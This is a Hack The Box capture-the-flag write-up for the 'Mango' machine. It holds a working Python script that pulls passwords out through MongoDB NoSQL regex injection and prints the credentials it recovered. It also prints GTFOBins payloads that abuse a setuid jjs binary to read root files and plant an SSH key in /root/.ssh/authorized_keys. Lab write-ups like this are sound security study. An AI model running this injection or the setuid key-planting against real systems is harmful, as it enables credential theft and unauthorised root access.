Mango HTB Writeup

From nmap we can see 3 open ports 22,80,443, visting port 80 we cannot see anything because we get a 403 status Forbidden.

Visiting port 443, there is something like a google search named Mango, which does nothing. Also there is a file named analytics.php which pulls code from codepen, but nothing of interest there. Viewing the ssl cert info I was able to extract a domain: staging-order.mango.htb. I add this to my /etc/hosts file.

staging-order.mango.htb is a website with login form, I intercept the requests there and try some nosql injections but nothing. Given the name of box(Mango) I think of mongodb, so I start and search for mongodb sql injection, I stubled accross a ctf writeup https://blog.0daylabs.com/2016/09/05/mongo-db-password-extraction-mmactf-100/. I try to do the same and find that the regex indded works, so I create a scipt to extarct the password using mango as username.

import requests
import string

url = 'http://staging-order.mango.htb'
username='mango'
password=''

while True:
    for chars in string.printable:
        if chars not in ['[', '\\','^','$','.','|','?','*','+','(',')']: #else this would break the regex
                payload = {'username': username, 'password[$regex]': "^" + password + chars, 'login': 'login'}
                r = requests.post(url, data=payload, allow_redirects=False)
                if r.status_code == 302:
                    print ("Found one char: %s" % password+chars)
                    password += chars

I found the password h3mXK8RhU~f{]f5H and try to login but I get a page under construction, which leads me nowhere. I remeber I had ssh open.

I ssh as mango using the password I found previously, I then try to read user.txt but that file is owned by admin which seems another user, the same password as mango for admin on ssh does not work, so I try to use the script again but this time using admin as the username.

I find another password t9KcS3>!0B#2, now I can read user.txt! Using LinEnum.sh I try to find any anomalies in the box, but nothing comes up, so I run it again but this time adding -t to do a thorough test. I found that /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs has setuid permission so I can run it as root user.

Going to https://gtfobins.github.io/ I search for jjs and find that I can use the following code to read a file, so I read root.txt:

echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/root/root.txt"));
while ((line = br.readLine()) != null) { print(line); }' | /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs

I now can submit root.txt file but I wasn’t really logged in as root.

I can also see I can use another code to write into a file so I paste my public ssh key:

echo 'var FileWriter = Java.type("java.io.FileWriter");
var fw=new FileWriter("/root/.ssh/authorized_keys");
fw.write("ssh-rsa AAAAB3NzaC1yc......");
fw.close();' | /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs

And now I can ssh into the box using root username, and login as root.